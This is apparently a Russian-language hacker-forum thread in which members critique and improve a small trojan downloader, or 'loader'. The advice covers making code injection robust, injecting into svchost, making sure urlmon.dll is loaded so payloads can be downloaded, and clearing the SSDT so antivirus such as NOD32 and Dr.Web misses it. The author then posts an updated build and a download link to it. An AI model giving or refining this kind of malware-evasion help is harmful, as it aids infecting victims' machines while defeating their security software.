Ухх открываем сорсы и начинаем готовить мат

*Сердечный приступ*

__________________

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

Ну фто ж, начнём =)
Метод инжекта не очень оригинальный. Но а вдруг выбранная тобой база уже занята? Тогда ведь песец ослику (С) =( Так что было бы неплохо добавить релоки и их обработку на всякий пожарный.
Насчет добавления в автозапуск - ну эээ я например комп неделями не перезагружаю.. имхо все же лучше запускать троя сразу. Хотя это на вкус и цвет.. но тогда придется подождать завершения скачивания через WaitForSingleObject на объекте созданного в другом процессе потока

Далее, а ты уверен, что URLMON.DLL окажется в адресном пространстве жертвы? Я - нет. Поэтому было бы неплохо вначало func() дописать LoadLibrary("urlmon.dll"); а то есть риск вылететь с Access Violation

Ну а вообще кода там не очень много, про сотню строчек больше сказать, вообщем-то и нечего
Разве что стиль отвратительный =) Ну ладно )

инжекст в свхост? и какие фаеры молчат, "огласите весь список пожалуйста" (с)
называть вещи надо своимим именами, молчать будет, по-моему, тока
виндовый фаер))) и пара таких же "псевдо" фаеров...

у мну НОД реагирует мож че то не так делаю... и согласен, что в хвост вставлять не стоит фаер по коннекту среагирует...
угу а изменение реестра нод не палит да?...

Гы-гы svchost меняет реестр! Ужс!

Можно конечн добавить чистку sdt, но тогда вес будет не 4 , а 11кб.

Смотря какой код возьмешь) Самый лучший вариант через нтсистемдебагконтрол, если достанешь, конечно)

Вот, критику учёл. Вес 11кб(непакованый), чистка sdt , др.веб уже в теме...
Заливать на разные файловики не стал - вес всего 7кб.

http://lordofring.tushino.com/LOADERv.1.1.rar

Откуда взял такой кривой код восстановления Sdt ?)